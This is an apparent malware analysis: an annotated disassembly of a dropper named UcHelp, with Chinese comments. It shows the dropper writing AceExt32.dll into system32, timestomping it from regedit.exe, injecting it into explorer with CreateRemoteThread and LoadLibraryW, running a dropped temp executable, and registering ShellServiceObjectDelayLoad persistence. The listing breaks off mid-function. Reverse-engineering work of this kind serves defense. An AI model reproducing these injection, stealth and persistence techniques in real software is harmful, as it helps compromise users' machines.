00401455 |. 68 80000000 PUSH 80 ; /BufSize = 80 (128.)
0040145A |. 8D4424 3C LEA EAX,DWORD PTR SS:[ESP+3C] ; |
0040145E |. 50 PUSH EAX ; |Buffer
0040145F |. FF15 6C204000 CALL DWORD PTR DS:[<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
00401465 |. 8B2D 78204000 MOV EBP,DWORD PTR DS:[<&KERNEL32.lstrcat>; kernel32.lstrcatA
0040146B |. 68 20224000 PUSH UcHelp.00402220 ; /\AceExt32.dll
00401470 |. 8D4C24 3C LEA ECX,DWORD PTR SS:[ESP+3C] ; |
00401474 |. 51 PUSH ECX ; |ConcatString
00401475 |. FFD5 CALL EBP ; \lstrcatA
00401477 |. 68 1C224000 PUSH UcHelp.0040221C ; /dll
0040147C |. 6A 67 PUSH 67 ; |ResourceName = 67
0040147E |. 6A 00 PUSH 0 ; |hModule = NULL
00401480 |. FF15 38204000 CALL DWORD PTR DS:[<&KERNEL32.FindResour>; \FindResourceA
00401486 |. 8BF0 MOV ESI,EAX
00401488 |. 56 PUSH ESI ; /hResource
00401489 |. 6A 00 PUSH 0 ; |hModule = NULL
0040148B |. FF15 34204000 CALL DWORD PTR DS:[<&KERNEL32.SizeofReso>; \SizeofResource
00401491 |. 56 PUSH ESI ; /hResource
00401492 |. 6A 00 PUSH 0 ; |hModule = NULL
00401494 |. 8BF8 MOV EDI,EAX ; |
00401496 |. FF15 30204000 CALL DWORD PTR DS:[<&KERNEL32.LoadResour>; \LoadResource
0040149C |. 8B1D 80204000 MOV EBX,DWORD PTR DS:[<&KERNEL32.CreateF>; kernel32.CreateFileA
004014A2 |. 6A 00 PUSH 0 ; /hTemplateFile = NULL
004014A4 |. 6A 00 PUSH 0 ; |Attributes = 0
004014A6 |. 6A 02 PUSH 2 ; |Mode = CREATE_ALWAYS
004014A8 |. 6A 00 PUSH 0 ; |pSecurity = NULL
004014AA |. 6A 00 PUSH 0 ; |ShareMode = 0
004014AC |.68 000000C0 PUSH C0000000; |Access= GENERIC_READ|GENERIC_WRITE
004014B1 |. 8D5424 50 LEA EDX,DWORD PTR SS:[ESP+50] ; |
004014B5 |. 52 PUSH EDX ; |FileName
004014B6 |. 894424 30 MOV DWORD PTR SS:[ESP+30],EAX ; |
004014BA |. FFD3 CALL EBX ; \CreateFileA
004014BC |. 8B4C24 14 MOV ECX,DWORD PTR SS:[ESP+14]
004014C0 |. 6A 00 PUSH 0 ; /pOverlapped = NULL
004014C2 |. 8BF0 MOV ESI,EAX ; |
004014C4 |. 8D4424 28 LEA EAX,DWORD PTR SS:[ESP+28];|
004014C8 |. 50 PUSH EAX ; |pBytesWritten
004014C9 |. 57 PUSH EDI ; |nBytesToWrite
004014CA |. 51 PUSH ECX ; |/nHandles
004014CB |. FF15 2C204000 CALL DWORD PTR DS:[<&KERNEL32.LockResour>; |\SetHandleCount
004014D1 |. 50 PUSH EAX ; |Buffer
004014D2 |. 56 PUSH ESI ; |hFile
004014D3 |. FF15 84204000 CALL DWORD PTR DS:[<&KERNEL32.WriteFile>>; \WriteFile
004014D9 |. 56 PUSH ESI ; /hObject
004014DA |. FF15 88204000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
004014E0 |. C68424 B80000>MOV BYTE PTR SS:[ESP+B8],0
004014E8 |. 33C0 XOR EAX,EAX; 释放资源dll到system32\AceExt32.dll
004014EA |. B9 1F000000 MOV ECX,1F
004014EF |. 8DBC24 B90000>LEA EDI,DWORD PTR SS:[ESP+B9]
004014F6 |. F3:AB REP STOS DWORD PTR ES:[EDI]
004014F8 |. 66:AB STOS WORD PTR ES:[EDI]
004014FA |. 68 80000000 PUSH 80 ; /BufSize = 80 (128.)
004014FF |. 8D9424 BC0000>LEA EDX,DWORD PTR SS:[ESP+BC] ; |
00401506 |. 52 PUSH EDX ; |Buffer
00401507 |. AA STOS BYTE PTR ES:[EDI] ; |
00401508 |. FF15 44204000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
0040150E |. 68 0C224000 PUSH UcHelp.0040220C ; /\regedit.exe
00401513 |. 8D8424 BC0000>LEA EAX,DWORD PTR SS:[ESP+BC] ; |
0040151A |. 50 PUSH EAX ; |ConcatString
0040151B |. FFD5 CALL EBP ; \lstrcatA
0040151D |. 6A 00 PUSH 0 ; /hTemplateFile = NULL
0040151F |. 68 80000000 PUSH 80 ; |Attributes = NORMAL
00401524 |. 6A 03 PUSH 3 ; |Mode = OPEN_EXISTING
00401526 |. 6A 00 PUSH 0 ; |pSecurity = NULL
00401528 |. 6A 00 PUSH 0 ; |ShareMode = 0
0040152A |. 68 00000080 PUSH 80000000 ; |Access = GENERIC_READ
0040152F |. 8D8C24 D00000>LEA ECX,DWORD PTR SS:[ESP+D0] ; |
00401536 |. 51 PUSH ECX ; |FileName
00401537 |. FFD3 CALL EBX ; \CreateFileA
00401539 |. 8BF0 MOV ESI,EAX ;检查 windows\regedit.exe
0040153B |. 8D5424 28 LEA EDX,DWORD PTR SS:[ESP+28]
0040153F |. 52 PUSH EDX ; /pLastWrite
00401540 |. 8D4424 20 LEA EAX,DWORD PTR SS:[ESP+20] ; |
00401544 |. 50 PUSH EAX ; |pLastAccess
00401545 |. 8D4C24 38 LEA ECX,DWORD PTR SS:[ESP+38] ; |
00401549 |. 51 PUSH ECX ; |pCreationTime
0040154A |. 56 PUSH ESI ; |hFile
0040154B |. FF15 68204000 CALL DWORD PTR DS:[<&KERNEL32.GetFileTim>; \GetFileTime
00401551 |. 85C0 TEST EAX,EAX ; 获取创建时间
00401553 |. 74 38 JE SHORT UcHelp.0040158D
00401555 |. 6A 00 PUSH 0 ; /hTemplateFile = NULL
00401557 |. 68 80000000 PUSH 80 ; |Attributes = NORMAL
0040155C |. 6A 03 PUSH 3 ; |Mode = OPEN_EXISTING
0040155E |. 6A 00 PUSH 0 ; |pSecurity = NULL
00401560 |. 6A 00 PUSH 0 ; |ShareMode = 0
00401562 |. 68 000000C0 PUSH C0000000 ;|Access = GENERIC_READ|GENERIC_WRITE
00401567 |. 8D5424 50 LEA EDX,DWORD PTR SS:[ESP+50] ; |
0040156B |. 52 PUSH EDX ; |FileName
0040156C |. FFD3 CALL EBX ; \CreateFileA
0040156E |. 8BF8 MOV EDI,EAX ; 检查 system32\AceExt32.dll
00401570 |. 8D4424 28 LEA EAX,DWORD PTR SS:[ESP+28]
00401574 |. 50 PUSH EAX ; /pLastWrite
00401575 |. 8D4C24 20 LEA ECX,DWORD PTR SS:[ESP+20] ; |
00401579 |. 51 PUSH ECX ; |pLastAccess
0040157A |. 8D5424 38 LEA EDX,DWORD PTR SS:[ESP+38] ; |
0040157E |. 52 PUSH EDX ; |pCreationTime
0040157F |. 57 PUSH EDI ; |hFile
00401580 |. FF15 64204000 CALL DWORD PTR DS:[<&KERNEL32.SetFileTim>; \SetFileTime
00401586 |. 57 PUSH EDI ; /hObject
00401587 |. FF15 88204000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
0040158D |> 56 PUSH ESI ; /hObject
0040158E |. FF15 88204000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00401594 |. 6A 00 PUSH 0 ; /Title = NULL
00401596 |. 68 FC214000 PUSH UcHelp.004021FC ; |shell_traywnd
0040159B |. FF15 F4204000 CALL DWORD PTR DS:[<&USER32.FindWindowA>>; \FindWindowA
004015A1 |. 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18]
004015A5 |. 51 PUSH ECX ; /pProcessID
004015A6 |. 50 PUSH EAX ; |hWnd
004015A7 |. FF15 F8204000 CALL DWORD PTR DS:[<&USER32.GetWindowThr>; \GetWindowThreadProcessId
004015AD |. 8B5424 18 MOV EDX,DWORD PTR SS:[ESP+18]
004015B1 |. 52 PUSH EDX ; /ProcessId
004015B2 |. 6A 00 PUSH 0 ; |Inheritable = FALSE
004015B4 |. 68 2A040000 PUSH 42A
; |Access = CREATE_THREAD|VM_OPERATION|VM_WRITE|QUERY_INFORMATION
004015B9 |. FF15 60204000 CALL DWORD PTR DS:[<&KERNEL32.OpenProces>; \OpenProcess
004015BF |. 8BF0 MOV ESI,EAX ; 获取 explorer pID
004015C1 |. 68 80000000 PUSH 80 ; /BufSize = 80 (128.)
004015C6 |. 8D8424 3C0100>LEA EAX,DWORD PTR SS:[ESP+13C] ; |
004015CD |. 50 PUSH EAX ; |Buffer
004015CE |. FF15 6C204000 CALL DWORD PTR DS:[<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
004015D4 |. 68 20224000 PUSH UcHelp.00402220 ; \AceExt32.dll
004015D9 |. 8D8C24 3C0100>LEA ECX,DWORD PTR SS:[ESP+13C]
004015E0 |. 51 PUSH ECX
004015E1 |. FFD5 CALL EBP
004015E3 |. 8D8424 380100>LEA EAX,DWORD PTR SS:[ESP+138]
004015EA |. 8D48 01 LEA ECX,DWORD PTR DS:[EAX+1]
004015ED |. 8D49 00 LEA ECX,DWORD PTR DS:[ECX]
004015F0 |> 8A10 /MOV DL,BYTE PTR DS:[EAX]
004015F2 |. 40 |INC EAX
004015F3 |. 84D2 |TEST DL,DL
004015F5 |.^ 75 F9 \JNZ SHORT UcHelp.004015F0
004015F7 |. 68 00010000 PUSH 100 ; /WideBufSize = 100 (256.)
004015FC |. 2BC1 SUB EAX,ECX ; |
004015FE |. 8D9424 BC0100>LEA EDX,DWORD PTR SS:[ESP+1BC] ; |
00401605 |. 52 PUSH EDX ;|WideCharBuf
00401606 |. 6A FF PUSH -1 ;|StringSize = FFFFFFFF (-1.)
00401608 |. 8D7C00 02 LEA EDI,DWORD PTR DS:[EAX+EAX+2] ; |
0040160C |. 8D8424 440100>LEA EAX,DWORD PTR SS:[ESP+144] ; |
00401613 |. 50 PUSH EAX ;|StringToMap
00401614 |. 6A 00 PUSH 0 ; |Options = 0
00401616 |. 6A 00 PUSH 0 ; |CodePage = CP_ACP
00401618 |. FF15 5C204000 CALL DWORD PTR DS:[<&KERNEL32.MultiByteT>; \MultiByteToWideChar
0040161E |. 6A 04 PUSH 4
00401620 |. 68 00100000 PUSH 1000
00401625 |. 57 PUSH EDI
00401626 |. 6A 00 PUSH 0
00401628 |. 56 PUSH ESI
00401629 |. FF15 58204000 CALL DWORD PTR DS:[<&KERNEL32.VirtualAll>; kernel32.VirtualAllocEx
0040162F |. 6A 00 PUSH 0 ; /pBytesWritten = NULL
00401631 |. 57 PUSH EDI ; |BytesToWrite
00401632 |. 8D8C24 C00100>LEA ECX,DWORD PTR SS:[ESP+1C0] ; |
00401639 |. 51 PUSH ECX ; |Buffer
0040163A |. 8BD8 MOV EBX,EAX ; |
0040163C |. 53 PUSH EBX ; |Address
0040163D |. 56 PUSH ESI ; |hProcess
0040163E |. FF15 54204000 CALL DWORD PTR DS:[<&KERNEL32.WriteProce>; \WriteProcessMemory
00401644 |. 68 EC214000 PUSH UcHelp.004021EC ; /LoadLibraryW
00401649 |. 68 E0214000 PUSH UcHelp.004021E0 ; |/Kernel32
0040164E |. FF15 50204000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleH>; |\GetModuleHandleA
00401654 |. 50 PUSH EAX ; |hModule
00401655 |. FF15 90204000 CALL DWORD PTR DS:[<&KERNEL32.GetProcAdd>; \GetProcAddress
0040165B |. 6A 00 PUSH 0
0040165D |. 6A 00 PUSH 0
0040165F |. 53 PUSH EBX
00401660 |. 50 PUSH EAX
00401661 |. 6A 00 PUSH 0
00401663 |. 6A 00 PUSH 0
00401665 |. 56 PUSH ESI
00401666 |. FF15 48204000 CALL DWORD PTR DS:[<&KERNEL32.CreateRemo>; kernel32.CreateRemoteThread
0040166C |. 5F POP EDI ; 0012FE20
0040166D |. 5E POP ESI
0040166E |. 5D POP EBP ; 加载 system32\AceExt32.dll 到explorer进程
0040166F |. 5B POP EBX
00401670 |. 8BE5 MOV ESP,EBP
00401672 |. 5D POP EBP
00401673 \. C3 RETN
=====================================================================
00401220 /$ 55 PUSH EBP
00401221 |. 8BEC MOV EBP,ESP
00401223 |. 83E4 F8 AND ESP,FFFFFFF8
00401226 |. 81EC 9C000000 SUB ESP,9C
0040122C |. 55 PUSH EBP
0040122D |. 56 PUSH ESI
0040122E |. 57 PUSH EDI
0040122F |. 33C0 XOR EAX,EAX
00401231 |. C64424 28 00 MOV BYTE PTR SS:[ESP+28],0
00401236 |. B9 1F000000 MOV ECX,1F
0040123B |. 8D7C24 29 LEA EDI,DWORD PTR SS:[ESP+29]
0040123F |. F3:AB REP STOS DWORD PTR ES:[EDI]
00401241 |. 66:AB STOS WORD PTR ES:[EDI]
00401243 |. AA STOS BYTE PTR ES:[EDI]
00401244 |. 8D4424 28 LEA EAX,DWORD PTR SS:[ESP+28]
00401248 |. 50 PUSH EAX ; /Buffer
00401249 |. 68 80000000 PUSH 80 ; |BufSize = 80 (128.)
0040124E |. FF15 4C204000 CALL DWORD PTR DS:[<&KERNEL32.GetTe>; \GetTempPathA
00401254 |. 68 A8214000 PUSH UcHelp.004021A8 ; /ulinshi32.exe
00401259 |. 8D4C24 2C LEA ECX,DWORD PTR SS:[ESP+2C] ; |
0040125D |. 51 PUSH ECX ; |ConcatString
0040125E |. FF15 78204000 CALL DWORD PTR DS:[<&KERNEL32.lstrc>; \lstrcatA
00401264 |. 68 A4214000 PUSH UcHelp.004021A4 ; /exe
00401269 |. 6A 66 PUSH 66 ; |ResourceName = 66
0040126B |. 6A 00 PUSH 0 ; |hModule = NULL
0040126D |. FF15 38204000 CALL DWORD PTR DS:[<&KERNEL32.FindR>; \FindResourceA
00401273 |. 8BF0 MOV ESI,EAX
00401275 |. 56 PUSH ESI ; /hResource
00401276 |. 6A 00 PUSH 0 ; |hModule = NULL
00401278 |. FF15 34204000 CALL DWORD PTR DS:[<&KERNEL32.Sizeo>; \SizeofResource
0040127E |. 56 PUSH ESI ; /hResource
0040127F |. 6A 00 PUSH 0 ; |hModule = NULL
00401281 |. 8BF8 MOV EDI,EAX ; |
00401283 |. FF15 30204000 CALL DWORD PTR DS:[<&KERNEL32.LoadR>; \LoadResource
00401289 |. 6A 00 PUSH 0 ; /hTemplateFile = NULL
0040128B |. 6A 00 PUSH 0 ; |Attributes = 0
0040128D |. 6A 02 PUSH 2 ; |Mode = CREATE_ALWAYS
0040128F |. 6A 00 PUSH 0 ; |pSecurity = NULL
00401291 |. 6A 00 PUSH 0 ; |ShareMode = 0
00401293 |. 68 000000C0 PUSH C0000000
; |Access = GENERIC_READ|GENERIC_WRITE
00401298 |. 8D5424 40 LEA EDX,DWORD PTR SS:[ESP+40]; |
0040129C |. 52 PUSH EDX ; |FileName
0040129D |. 8BE8 MOV EBP,EAX ; |
0040129F |. FF15 80204000 CALL DWORD PTR DS:[<&KERNEL32.Creat>; \CreateFileA
004012A5 |. 6A 00 PUSH 0 ; /pOverlapped = NULL
004012A7 |. 8BF0 MOV ESI,EAX ; |
004012A9 |. 8D4424 24 LEA EAX,DWORD PTR SS:[ESP+24] ; |
004012AD |. 50 PUSH EAX ; |pBytesWritten
004012AE |. 57 PUSH EDI ; |nBytesToWrite
004012AF |. 55 PUSH EBP ; |/nHandles
004012B0 |. FF15 2C204000 CALL DWORD PTR DS:[<&KERNEL32.LockR>; |\SetHandleCount
004012B6 |. 50 PUSH EAX ; |Buffer
004012B7 |. 56 PUSH ESI ; |hFile
004012B8 |. FF15 84204000 CALL DWORD PTR DS:[<&KERNEL32.Write>; \WriteFile
004012BE |. 56 PUSH ESI ; /hObject
004012BF |. FF15 88204000 CALL DWORD PTR DS:[<&KERNEL32.Close>; \CloseHandle
004012C5 |. 33C9 XOR ECX,ECX
; 将资源 exe 释放到临时文件夹保存为 ulinshi32.exe
004012C7 |. 894C24 15 MOV DWORD PTR SS:[ESP+15],ECX
004012CB |. 66:894C24 19 MOV WORD PTR SS:[ESP+19],CX
004012D0 |. 8D5424 10 LEA EDX,DWORD PTR SS:[ESP+10]
004012D4 |. 52 PUSH EDX /pHandle
004012D5 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
004012DA |. C64424 1C 00 MOV BYTE PTR SS:[ESP+1C],0 ; |
004012DF |. 884C24 23 MOV BYTE PTR SS:[ESP+23],CL ; |
004012E3 |. 51 PUSH ECX ; |Reserved => 0
004012E4 |. 68 78214000 PUSH UcHelp.00402178
; |SOFTWARE\Microsoft\Windows\CurrentVersion
004012E9 |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004012EE |. FF15 08204000 CALL DWORD PTR DS:[<&ADVAPI32.RegOp>; \RegOpenKeyExA
004012F4 |. 8D4424 1C LEA EAX,DWORD PTR SS:[ESP+1C]
004012F8 |. 50 PUSH EAX ; /pBufSize
004012F9 |. 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]; |
004012FD |. 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18]; |
00401301 |. 51 PUSH ECX ; |Buffer
00401302 |. 8D5424 2C LEA EDX,DWORD PTR SS:[ESP+2C] ; |
00401306 |. 52 PUSH EDX ; |pValueType
00401307 |. 6A 00 PUSH 0 ; |Reserved = NULL
00401309 |. 68 6C214000 PUSH UcHelp.0040216C ; |SM_GameDrop
0040130E |. 50 PUSH EAX ; |hKey
0040130F |. FF15 04204000 CALL DWORD PTR DS:[<&ADVAPI32.RegQu>; \RegQueryValueExA
00401315 |. 85C0 TEST EAX,EAX ;检查 SM_GameDrop 项目是否存在
00401317 |. 74 44 JE SHORT UcHelp.0040135D ; 不存在，就走下面的
00401319 |. 6A 05 PUSH 5 ; /ShowState = SW_SHOW
0040131B |. 8D4C24 2C LEA ECX,DWORD PTR SS:[ESP+2C] ; |无就运行 ulinshi32.exe
0040131F |. 51 PUSH ECX ; |CmdLine
00401320 |. FF15 94204000 CALL DWORD PTR DS:[<&KERNEL32.WinEx>; \WinExec
00401326 |. 68 68214000 PUSH UcHelp.00402168 ; /yes
0040132B |. FF15 3C204000 CALL DWORD PTR DS:[<&KERNEL32.lstrl>; \lstrlenA
00401331 |. 8B5424 10 MOV EDX,DWORD PTR SS:[ESP+10] ; 检查键值是否是yes
00401335 |. 50 PUSH EAX ; /BufSize
00401336 |. 68 68214000 PUSH UcHelp.00402168 ; |yes
0040133B |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
0040133D |. 6A 00 PUSH 0 ; |Reserved = 0
0040133F |. 68 6C214000 PUSH UcHelp.0040216C ; |SM_GameDrop
00401344 |. 52 PUSH EDX ; |hKey
00401345 |. FF15 00204000 CALL DWORD PTR DS:[<&ADVAPI32.RegSe>; \RegSetValueExA
0040134B |. 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10]
0040134F |. 50 PUSH EAX ; /hKey
00401350 |. FF15 18204000 CALL DWORD PTR DS:[<&ADVAPI32.RegCl>; \RegCloseKey
00401356 |. 5F POP EDI
00401357 |. 5E POP ESI ; 创建 SM_GameDrop 项目
00401358 |. 5D POP EBP
00401359 |. 8BE5 MOV ESP,EBP
0040135B |. 5D POP EBP
0040135C |. C3 RETN
0040135D |> 8B4C24 10 MOV ECX,DWORD PTR SS:[ESP+10]
00401361 |. 51 PUSH ECX ; /hKey
00401362 |. FF15 18204000 CALL DWORD PTR DS:[<&ADVAPI32.RegCl>; \RegCloseKey
00401368 |. 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
0040136C |. 68 68214000 PUSH UcHelp.00402168 ; /yes
00401371 |. 52 PUSH EDX ; |s1
00401372 |. FF15 A0204000 CALL DWORD PTR DS:[<&MSVCRT._stricm>; \_stricmp
00401378 |. 83C4 08 ADD ESP,8 ; 检查SM_GameDrop 键值是否为yes
0040137B |. 85C0 TEST EAX,EAX
0040137D |. 74 0D JE SHORT UcHelp.0040138C ; 否就运行 ulinshi32.exe
0040137F |. 6A 05 PUSH 5 ; /ShowState = SW_SHOW
00401381 |. 8D4424 2C LEA EAX,DWORD PTR SS:[ESP+2C] ; |
00401385 |. 50 PUSH EAX ; |CmdLine
00401386 |. FF15 94204000 CALL DWORD PTR DS:[<&KERNEL32.WinEx>; \WinExec
0040138C |> 5F POP EDI
0040138D |. 5E POP ESI
0040138E |. 5D POP EBP
0040138F |. 8BE5 MOV ESP,EBP
00401391 |. 5D POP EBP
00401392 \. C3 RETN
=====================================================================
00401680 /$ 55 PUSH EBP
00401681 |. 8BEC MOV EBP,ESP
00401683 |. 83E4 F8 AND ESP,FFFFFFF8
00401686 |. 81EC 08010000 SUB ESP,108
0040168C |. 53 PUSH EBX
0040168D |. 55 PUSH EBP
0040168E |. 56 PUSH ESI
0040168F |. 57 PUSH EDI
00401690 |. B9 09000000 MOV ECX,9
00401695 |. BE 08234000 MOV ESI,UcHelp.00402308
; {35CEC8A3-2BE6-11D2-8773-92E220524150}
0040169A |. 8DBC24 980000>LEA EDI,DWORD PTR SS:[ESP+98]
004016A1 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD P>
004016A3 |. 66:A5 MOVS WORD PTR ES:[EDI],WORD PTR DS:>
004016A5 |. A4 MOVS BYTE PTR ES:[EDI],BYTE PTR DS:>
004016A6 |. 33C0 XOR EAX,EAX
004016A8 |. B9 16000000 MOV ECX,16
004016AD |. 8DBC24 BF0000>LEA EDI,DWORD PTR SS:[ESP+BF]
004016B4 |. F3:AB REP STOS DWORD PTR ES:[EDI]
004016B6 |. AA STOS BYTE PTR ES:[EDI]
004016B7 |. 33C0 XOR EAX,EAX
004016B9 |. C64424 18 00 MOV BYTE PTR SS:[ESP+18],0
004016BE |. B9 1F000000 MOV ECX,1F
004016C3 |. 8D7C24 19 LEA EDI,DWORD PTR SS:[ESP+19]
004016C7 |. F3:AB REP STOS DWORD PTR ES:[EDI]
004016C9 |. 66:AB STOS WORD PTR ES:[EDI]
004016CB |. AA STOS BYTE PTR ES:[EDI]
004016CC |. 68 80000000 PUSH 80 ; /BufSize = 80 (128.)
004016D1 |. 8D4424 1C LEA EAX,DWORD PTR SS:[ESP+1C] ; |
004016D5 |. 50 PUSH EAX ; |Buffer
004016D6 |. FF15 6C204000 CALL DWORD PTR DS:[<&KERNEL32.GetSy>; \GetSystemDirectoryA
004016DC |. 68 20224000 PUSH UcHelp.00402220 ; /\AceExt32.dll
004016E1 |. 8D4C24 1C LEA ECX,DWORD PTR SS:[ESP+1C] ; |
004016E5 |. 51 PUSH ECX ; |ConcatString
004016E6 |. FF15 78204000 CALL DWORD PTR DS:[<&KERNEL32.lstrc>; \lstrcatA
004016EC |. 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
004016F0 |. 52 PUSH EDX ; /pHandle
004016F1 |. 68 C0224000 PUSH UcHelp.004022C0
; |SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
004016F6 |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004016FB |. FF15 10204000 CALL DWORD PTR DS:[<&ADVAPI32.RegOp>; \RegOpenKeyA
00401701 |. 8B35 3C204000 MOV ESI,DWORD PTR DS:[<&KERNEL32.ls>; kernel32.lstrlenA
00401707 |. 8D8424 980000>LEA EAX,DWORD PTR SS:[ESP+98]
0040170E |. 50 PUSH EAX ; /String
0040170F |. FFD6 CALL ESI ; \lstrlenA
00401711 |. 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
00401715 |. 8B3D 00204000 MOV EDI,DWORD PTR DS:[<&ADVAPI32.Re>
; ADVAPI32.RegSetValueExA
0040171B |. 50 PUSH EAX ; /BufSize
0040171C |. 8D8C24 9C0000>LEA ECX,DWORD PTR SS:[ESP+9C]; |
00401723 |. 51 PUSH ECX ; |Buffer
00401724 |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
00401726 |. 6A 00 PUSH 0 ; |Reserved = 0
00401728 |. 68 B8224000 PUSH UcHelp.004022B8 ; |AceExt
0040172D |. 52 PUSH EDX ; |hKey
0040172E |. FFD7 CALL EDI ; \RegSetValueExA
00401730 |. 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
00401734 |. 8B1D 18204000 MOV EBX,DWORD PTR DS:[<&ADVAPI32.Re>; ADVAPI32.RegCloseKey
0040173A |. 50 PUSH EAX ; /hKey
0040173B |. FFD3 CALL EBX ; \RegCloseKey
0040173D |. 8B2D 0C204000 MOV EBP,DWORD PTR DS:[<&ADVAPI32.Re>; ADVAPI32.RegCreateKeyA
00401743 |. 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
; 下面是建立 CLSID {35CEC8A3-2BE6-11D2-8773-92E220524150}
00401747 |. 51 PUSH ECX ; /pHandle
00401748 |. 68 88224000 PUSH UcHelp.00402288
; |CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150}
0040174D |. 68 00000080 PUSH 80000000 ; |hKey = HKEY_CLASSES_ROOT
00401752 |. FFD5 CALL EBP ; \RegCreateKeyA
00401754 |. 68 B8224000 PUSH UcHelp.004022B8 ; /AceExt
00401759 |. FFD6 CALL ESI ; \lstrlenA
0040175B |. 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
0040175F |. 50 PUSH EAX ; /BufSize
00401760 |. 68 B8224000 PUSH UcHelp.004022B8 ; |AceExt
00401765 |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
00401767 |. 6A 00 PUSH 0 ; |Reserved = 0
00401769 |. 68 84224000 PUSH UcHelp.00402284 ; |ValueName = ""
0040176E |. 52 PUSH EDX ; |hKey
0040176F |. FFD7 CALL EDI ; \RegSetValueExA
00401771 |. 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
00401775 |. 50 PUSH EAX ; /hKey
00401776 |. FFD3 CALL EBX ; \RegCloseKey
00401778 |. 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
0040177C |. 51 PUSH ECX ; /pHandle
0040177D |. 68 48224000 PUSH UcHelp.00402248
; |CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150}\InprocServer32
00401782 |. 68 00000080 PUSH 80000000 ; |hKey = HKEY_CLASSES_ROOT
00401787 |. FFD5 CALL EBP ; \RegCreateKeyA
00401789 |. 8D5424 18 LEA EDX,DWORD PTR SS:[ESP+18] ;建立子键 \InprocServer32
0040178D |. 52 PUSH EDX ; /String
0040178E |. FFD6 CALL ESI ; \lstrlenA
00401790 |. 50 PUSH EAX ; /BufSize
00401791 |. 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]
; |以下是将 AceExt32.dll 与之关联
00401795 |. 8D4424 1C LEA EAX,DWORD PTR SS:[ESP+1C] ; |
00401799 |. 50 PUSH EAX ; |Buffer
0040179A |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
0040179C |. 6A 00 PUSH 0 ; |Reserved = 0
0040179E |. 68 84224000 PUSH UcHelp.00402284 ; |ValueName = ""
004017A3 |. 51 PUSH ECX ; |hKey
004017A4 |. FFD7 CALL EDI ; \RegSetValueExA
004017A6 |. 68 40224000 PUSH UcHelp.00402240 ; /Both
004017AB |. FFD6 CALL ESI ; \lstrlenA
004017AD |. 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
004017B1 |. 50 PUSH EAX ; /BufSize
004017B2 |. 68 40224000 PUSH UcHelp.00402240 ; |Both
004017B7 |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
004017B9 |. 6A 00 PUSH 0 ; |Reserved = 0
004017BB |. 68 30224000 PUSH UcHelp.00402230 ; |ThreadingModel
004017C0 |. 52 PUSH EDX ; |hKey
004017C1 |. FFD7 CALL EDI ; \RegSetValueExA
004017C3 |. 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
004017C7 |. 50 PUSH EAX ; /hKey
004017C8 |. FFD3 CALL EBX ; \RegCloseKey
004017CA |. 5F POP EDI
; 以上是相关 CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150} 的项目情况
004017CB |. 5E POP ESI
004017CC |. 5D POP EBP
004017CD |. 5B POP EBX
004017CE |. 8BE5 MOV ESP,EBP
004017D0 |. 5D POP EBP
004017D1 \. C3 RETN
=====================================================================
004013A0 /$ 55 PUSH EBP
004013A1 |. 8BEC MOV EBP,ESP
004013A3 |. 83E4 F8 AND ESP,FFFFFFF8
004013A6 |. 81EC 04010000 SUB ESP,104
004013AC |. 57 PUSH EDI
004013AD |. 33C0 XOR EAX,EAX
004013AF |. C68424 880000>MOV BYTE PTR SS:[ESP+88],0
004013B7 |. B9 1F000000 MOV ECX,1F
004013BC |. 8DBC24 890000>LEA EDI,DWORD PTR SS:[ESP+89]
004013C3 |. F3:AB REP STOS DWORD PTR ES:[EDI]
004013C5 |. 66:AB STOS WORD PTR ES:[EDI]
004013C7 |. AA STOS BYTE PTR ES:[EDI]
004013C8 |. 33C0 XOR EAX,EAX
004013CA |. C64424 08 00 MOV BYTE PTR SS:[ESP+8],0
004013CF |. B9 1F000000 MOV ECX,1F
004013D4 |. 8D7C24 09 LEA EDI,DWORD PTR SS:[ESP+9]
004013D8 |. F3:AB REP STOS DWORD PTR ES:[EDI]
004013DA |. 66:AB STOS WORD PTR ES:[EDI]
004013DC |. AA STOS BYTE PTR ES:[EDI]
004013DD |. 68 80000000 PUSH 80 ; /BufSize = 80 (128.)
004013E2 |. 8D8424 8C0000>LEA EAX,DWORD PTR SS:[ESP+8C]; |
004013E9 |. 50 PUSH EAX ; |PathBuffer
004013EA |. 6A 00 PUSH 0 ; |hModule = NULL
004013EC |. FF15 7C204000 CALL DWORD PTR DS:[<&KERNEL32.GetMo>; \GetModuleFileNameA
004013F2 |. 68 80000000 PUSH 80 ; /BufSize = 80 (128.)
004013F7 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C] ; |
004013FB |. 51 PUSH ECX ; |Buffer
